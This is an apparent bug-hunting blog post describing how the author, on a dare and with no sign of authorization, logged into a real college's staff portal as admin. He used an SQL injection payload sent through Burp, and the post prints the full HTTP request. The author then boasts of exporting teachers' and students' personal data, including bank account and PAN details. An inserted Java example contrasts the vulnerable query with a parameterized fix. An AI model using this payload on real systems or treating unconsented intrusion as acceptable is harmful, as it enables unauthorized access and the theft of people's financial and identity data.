How I exposed the teacher’s Aadhaar card, bank details on the college website.
2022-2-1 14:27:23 Author: infosecwriteups.com

Ramalingasamy

Hey fellow hackers and Bug hunters,

After a long gap in my bug hunting, I am back with a write-up.

One day, after I finished my intern work, I went to play cricket with my friends. They said that even if you have a Google Honorable Mention, it doesn't mean you are a real hunter. One of them said, "If you are a real hunter, can you retrieve my information from my college website?"

As usual, I am not going to disclose the target webpage. I visited his college webpage and explored its functionality. As soon as I saw the staff login page, I moved to it. As usual, if we see a login page, we will surely give it a try for SQLi. I tried some payloads, but I couldn't type the payload into the textbox: there was client-side validation meant to stop these kinds of injections.

But there was only client-side validation.

Silly guys..

I opened Burp, captured the request, edited the username parameter to `admin' or '1'='1'#` and sent the request... BOOOOM!!!! I was logged in as ADMIN with admin privileges.

POST /Staff/loginProcess.jsp?submit=Log%20In HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: https://test.com
Connection: close
Referer: https://test.com
Cookie: JSESSIONID=session;
Upgrade-Insecure-Requests: 1

username=admin' or '1'='1'#&password=admin&submit=
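The server-side flaw behind this request, as an added illustration that is not code from the write-up or from the college's site: a login query built by string concatenation, as a loginProcess.jsp of this kind typically does, next to the parameterized version that defeats the same input. The table and column names are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class StaffLogin {

    // VULNERABLE (assumed shape of the original): the username is spliced
    // into the SQL text, so the value  admin' or '1'='1'#  turns the query into
    //   ... WHERE username='admin' or '1'='1'#' AND password='admin'
    // MySQL treats everything after '#' as a comment, the OR is always true,
    // and the first row returned (typically the admin account) is logged in.
    // The client-side textbox check never ran because the request was edited
    // in a proxy; only the server can enforce validation.
    static boolean authenticateVulnerable(Connection db, String user, String pass)
            throws SQLException {
        String sql = "SELECT id FROM staff WHERE username='" + user
                + "' AND password='" + pass + "'";
        try (Statement st = db.createStatement();
             ResultSet rs = st.executeQuery(sql)) {
            return rs.next();
        }
    }

    // FIXED: both values are bound as parameters. The driver sends them as
    // data, never as SQL text, so the same payload is compared literally
    // against the username column and matches no row. (Password storage and
    // hashing are a separate concern not covered here.)
    static boolean authenticateSafe(Connection db, String user, String pass)
            throws SQLException {
        String sql = "SELECT id FROM staff WHERE username=? AND password=?";
        try (PreparedStatement ps = db.prepareStatement(sql)) {
            ps.setString(1, user);
            ps.setString(2, pass);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }
}
```

A quick check after the fix: replaying the captured request with the same username value should return the normal failed-login page, and the database query log should show the quote characters arriving inside the bound value rather than in the statement text.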

After I logged in as admin, I was able to retrieve all the information about the students. I could even see any teacher's full details. I was like WTF!!!

I was able to export all the information, even account numbers, bank names and PAN card details.

Thank you for reading this write-up.

Follow me for more bug hunting write-ups.

Follow me on Instagram : https://www.instagram.com/ram_0x_infosec/

Connect with me on LinkedIn: https://www.linkedin.com/in/ram0xinfosec/


Article source: https://infosecwriteups.com/how-i-exposed-the-teachers-aadhaar-card-bank-details-in-the-college-website-3e8d44446378?source=rss----7b722bfd1b8d--bug_bounty